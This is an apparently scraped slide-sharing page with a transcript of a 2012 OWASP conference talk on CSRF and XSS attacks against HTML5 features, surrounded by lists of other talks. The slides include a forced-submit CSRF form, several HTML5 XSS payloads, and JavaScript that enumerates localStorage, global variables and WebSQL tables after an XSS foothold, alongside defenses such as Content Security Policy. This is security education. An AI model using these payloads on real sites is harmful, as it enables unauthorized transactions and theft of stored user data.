An Intro to Mobile HTML5
 
HTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすものHTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすもの
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012
 
Technology Trends
Technology TrendsTechnology Trends
Technology Trends
 

More from Shreeraj Shah

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingShreeraj Shah
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Shreeraj Shah
 

More from Shreeraj Shah (15)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Recently uploaded

Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Nikki Chapple
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Microservices, Docker deploy and Microservices source code in C#
Microservices, Docker deploy and Microservices source code in C#Microservices, Docker deploy and Microservices source code in C#
Microservices, Docker deploy and Microservices source code in C#Karmanjay Verma
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxAna-Maria Mihalceanu
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Kuma Meshes Part I - The basics - A tutorial
Kuma Meshes Part I - The basics - A tutorialKuma Meshes Part I - The basics - A tutorial
Kuma Meshes Part I - The basics - A tutorialJoão Esperancinha
 

Recently uploaded (20)

Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Microservices, Docker deploy and Microservices source code in C#
Microservices, Docker deploy and Microservices source code in C#Microservices, Docker deploy and Microservices source code in C#
Microservices, Docker deploy and Microservices source code in C#
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance Toolbox
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Kuma Meshes Part I - The basics - A tutorial
Kuma Meshes Part I - The basics - A tutorialKuma Meshes Part I - The basics - A tutorial
Kuma Meshes Part I - The basics - A tutorial
 

XSS and CSRF with HTML5

  • 1. XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP OWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj  Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd.  Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev)  Interest  Web security research  Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.  Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
  • 3. HTML5 VECTORS – ATTACK SURFACE OWASP 3
  • 4. HTML5 – Attacks on the rise … Evolution of HTML5  1991 – HTML started (plain and simple)  1996 – CSS & JavaScript (Welcome to world of XSS and browser security)  2000 – XHTML1 (Growing concerns and attacks on browsers)  2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion)  2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
  • 5. Modern Browser Model Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
  • 6. HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSS Single JavaScript Internet DOM/Page Application XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
  • 7. CSRF WITH HTML5 OWASP 7
  • 8. CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
  • 9. SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
  • 10. Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
  • 11. CSRF injection – splitting and forcing … <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"? ><methodCall><methodName>stocks.buy</methodName><params><param ><value><string>MSFT</string></value></param><param><value><double>2 6</double></value></param></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 11
  • 12. CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
  • 13. XHR – Level 2 powering CSRF XHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/download xhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“ Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
  • 14. CORS & XHR – ingredients for CSRF Before HTML5 – Cross Domain was not possible through XHR (SOP applicable) HTML5 – allows cross origin calls with XHR-Level 2 calls CORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls) Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
  • 15. CORS based HTTP Headers Request Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight) Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
  • 16. XHR – Stealth POST/GET CSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
  • 17. Exploiting the use case CORS preflight bypass – certain Content-Type bypass preflight HTTP Forcing cookie replay by “withCredentials” Internal network scanning and tunneling Information harvesting (internal crawling) Stealth browser shell – post XSS (Allow origin- *) Business functionality abuse (upload and binary streams) OWASP 17
  • 18. CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
  • 19. CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
  • 20. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
  • 21. CSRF & HTML5 OWASP 21
  • 22. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
  • 23. CSRF & HTML5 OWASP 23
  • 24. CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
  • 25. CSRF/Upload - POC OWASP 25
  • 26. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
  • 27. CSRF/Upload OWASP 27
  • 28. Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
  • 29. Internal Scan for CORS OWASP 29
  • 30. Scan and Defend Scan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or not Defense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
  • 31. XSS WITH HTML5 OWASP 31
  • 32. XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
  • 33. HTML5 – Tags/Attributes/Events Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) Attributes – form, submit, autofocus, sandbox, manifest, rel etc. Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
  • 34. XSS variants Media tags Examples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
  • 35. XSS variants Exploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
  • 36. XSS variants Form & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">test Etc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
  • 37. Scan and Defend Scan and look for Reflected or Persistent XSS spots with HTML5 tags Defense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
  • 38. CSP in Action – HTML5 defense … Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
  • 39. Blocking Scripts Content-Security-Policy: script-src 'self‘ Only allowing script from the self Other mechanism 'unsafe-inline' - blocking inline 'unsafe-eval‘ – blocking eval type calls Post XSS defense can be crafted OWASP 39
  • 40. Controlling Browser connect-src – Controlling WebSocket, XHR etc. frame-src – Source of the frame (ClickJacking) object-src – Flash, Silverlight etc. media-src – controlling audio and video img/style – image and style sources default-src https:; - locking over SSL only OWASP 40
  • 41. Example  Persistent XSS injected HTTP/1.1 200 OK Date: Wed, 12 Sep 2012 14:40:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-WebKit-CSP: script-src 'self' X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6146 OWASP 41
  • 42. Storage extraction with XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
  • 43. Web Storage Extraction Browser has one place to store data – Cookie (limited and replayed) HTML5 – Storage API provided (Local and Session) Can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 43
  • 44. Web Storage Extraction It is possible to steal them through XSS or via JavaScript Session hijacking – HttpOnly of no use getItem and setItem calls XSS the box and scan through storage OWASP 44
  • 45. Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } Above code allows all storage variable extraction OWASP 45
  • 46. File System Storage HTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem; It becomes a full blown local system for application in sandbox It empowers application OWASP 46
  • 47. File System Storage It provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); }  App can have full filesystem in place now. OWASP 47
  • 48. Sensitive information filesystem Assuming app is creating profile on local system OWASP 48
  • 49. Extraction through XSS Once have an entry point – game over! OWASP 49
  • 50. Single DOM/One Page App - XSS Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
  • 51. Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } OWASP 51
  • 52. Global Sensitive Information Extraction from DOM HTML5 apps running on Single DOM Having several key global variables, objects and array var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423mjfdvint","t est.com"]; Post DOM based exploitation possible and harvesting all these values. OWASP 52
  • 53. Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } OWASP 53
  • 54. Scan and Defend Scan and look for Scanning storage Defense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
  • 55. SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
  • 56. SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 56
  • 57. SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 57
  • 58. Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
  • 59. Blind WebSQL Enumeration We will run through all objects and get object where constructor is “Database” We will make Select query directly to sqlite_master database We will grab 1st table leaving webkit table on 0th entry OWASP 59
  • 61. Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
  • 62. Web Messaging  HTML5 is having new interframe communication system called Web Messaging.  By postMessage() call parent frame/domain can call with the iframe  Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible  worker.webkitPostMessage – faster transferable objects OWASP 62
  • 63. Web Messaging - Scenario If postMessage() is set to * so page can be loaded in iframe and messaging can be hijacked Also, origin is not set to fixed then again frame listen from any domian – again an issue Stream coming needs to be checked before innerHTML or eval() Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
  • 64. Origin check OWASP 64
  • 65. Web Worker – Hacks! Web Workers allows threading into HTML pages using JavaScript No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers Totally Async and well supported [initialize] var worker = new Worker('task.js'); [Messaging] worker.postMessage(); OWASP 65
  • 66. Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
